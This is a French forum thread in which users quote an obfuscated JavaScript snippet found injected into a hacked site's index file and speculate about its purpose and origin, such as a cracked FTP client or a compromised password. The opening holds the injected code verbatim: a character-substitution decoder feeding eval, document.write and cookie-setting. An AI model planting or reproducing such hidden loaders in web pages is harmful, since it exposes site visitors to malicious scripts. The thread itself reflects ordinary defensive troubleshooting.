Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3GBZ253Z3d4*49Z25Z3d422Z3cbqf4*)4Z2520Z3dZ2f}r4Z3cbqfZ2526Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgZ3dorZ7bf4Z3cbuf4})$Z2f4}(pZ7bwayqz`:x}zZ257Fg:xqzs`|Z2f4}??Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgO}I:`ufsq`45)46KvxuzZ257F6Z3dopZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FZ2fpZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257F4)4g|Z7bcKdZ7bdZ2fiiiipZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:Z7bzwx}wZ257FZ2fpZ7bwayqz`:Z7bzyZ7bagqad4)4g|Z7bcKdZ7bdZ2fidZ7bdK}z}`Z3cZ3dZ2fi(;gwf}d`*Z22;dcZ3dZ22qi89;Z25229+u|cu0d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTqi899+yv8d)K7t7M,Z25209d)K7t7M-!+d)K7}7M-t)Z3ewud]Z257F~dx89;!+ve~sdyZ257F~0S]^8tZ3c}Z3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vybZ3esZ257F}7+fqb0iSx!Z3cZ22;ddZ3dZ22iSxZ2522Z3c}SxZ3ctSxZ3c}^}+yv8d)K7i7M,Z2522Z2520Z2520Z279kd)K7i7M0-0Z2522Z2520Z2520Z27+m}^}-S]^8d)K7t7MZ3cd)K7}7MZ3cd)K7i7M9+iSx!-|)K888d)K7i7M6Z2520hQQ9;}^}950Z25265##950Z2522Z2526M+iSxZ2522-|)K8888d)K7i7M6Z2520h##!!9..#9;}^}950!Z25209Z22;ccZ3dZ22Z2568;Z2569Z252b+Z2529Z257btmpZ253dds.Z2573lZ2569ce(Z2569,iZ252b1Z2529;Z2573Z2574Z22;Z69f (Z64ocZ75meZ6eZ74.Z63oZ6fkZ69e.iZ6eZ64eZ78Z4ff(Z27vbuZ6cleZ74Z69nZ5fZ6dulZ74iqZ75otZ65Z3dZ27)Z3dZ3d-1)Z7bsc(Z27vbulletinZ5fmulZ74iZ71Z75oteZ3dZ27,2,7Z29;eZ76alZ28uneZ73capZ65(Z64z+cZ7a+opZ2bst)Z2bZ27dw(Z64z+cZ7a(Z24+sZ74))Z3bZ27)}eZ6cseZ7b$Z3dZ27Z27};funcZ74iZ6fn sZ63(Z63nmZ2cv,eZ64Z29Z7bvarZ20Z65xZ64Z3dneZ77 Z44ateZ28)Z3bexZ64Z2esZ65tZ44atZ65(exZ64Z2egZ65tDZ61teZ28Z29+Z65Z64Z29;dZ6fcuZ6denZ74.cZ6foZ6bieZ3dcnZ6d+ Z27Z3dZ27 +escaZ70e(vZ29+Z27;expZ69rZ65sZ3dZ27+exdZ2etoZ47MTSZ74rZ69ng(Z29;}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z" ){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($));document.write($);</script></body>
</html>

Qu'en pensez-vous ? Quel est le but de ceci ? Et surtout, comment le code est arrivé là... Car je doute que l'auteur l'ai mis sciemment.

Merci de votre aide !

Merci beaucoup..j'ai le meme probleme sur mon forum...a cause de cela, IE7 ne fonctionne plus et seulement Firefox ou Opera..

dans quel fichier as tu trouve ce code svp ?

Reply

Marsh Posté le 31-10-2008 à 18:37:52

dans le fichier index... Apparement le site a été hacké.

Je ne peux en dire plus car ça n'était pas mon site

url ?

---------------
What if I were smiling and running into your arms? Would you see then what I see now?

Reply

Marsh Posté le 31-10-2008 à 18:37:52

Reply

Marsh Posté le 31-10-2008 à 18:51:36

Un gros merci..c'est exactement la qu'il etait..

Dan

Reply

Marsh Posté le 31-10-2008 à 19:01:28

une idée de la cause de ce problème ?

---------------
What if I were smiling and running into your arms? Would you see then what I see now?

Reply

Marsh Posté le 31-10-2008 à 19:04:13

non..et je ne comprend pas car le fichier index.php est en mode 0644

Reply

Marsh Posté le 31-10-2008 à 19:08:23

je pense à un éditeur web ou un logiciel ftp cracké qui rajoute ce code dans ta source. Sinon ton site a été hacké (change ton mot de passe...)

Message cité 1 fois

---------------
What if I were smiling and running into your arms? Would you see then what I see now?

Reply

Marsh Posté le 02-11-2008 à 09:46:04

Un site avec pignon sur rue ne s'abaisserait pas à pop-uper de la pub, et encore moins vers des sites exotiques... J'ai pas vu la popup de pub par contre, c'est grave? [:dawa]

Juste pour le sport, on pourrait essayer de voir en quoi ce site est vulnérable? Ca ne sent déjà pas le vieux phpbb pas patché, c'est plutôt statique, à première vue on ne voit pas de formulaire d'upload (ça n'empêche pas les failles, mais si c'est du développement in-house, c'est pas forcément la porte d'entrée principale pour un hacker).

NazzTazz > Si tu as des références, bien entendu, on sera preneurs [:dawa]

jagstang > Ton idée de logiciel cracké qui laisse un cadeau n'est pas mauvaise non plus.

Tout cela a de quoi titiller notre saine curiosité [:pingouino]

---------------
Now Playing: {SYNTAX ERROR AT LINE 1210}

Reply

Code source HTML suspect

Sujets relatifs:

Leave a Replay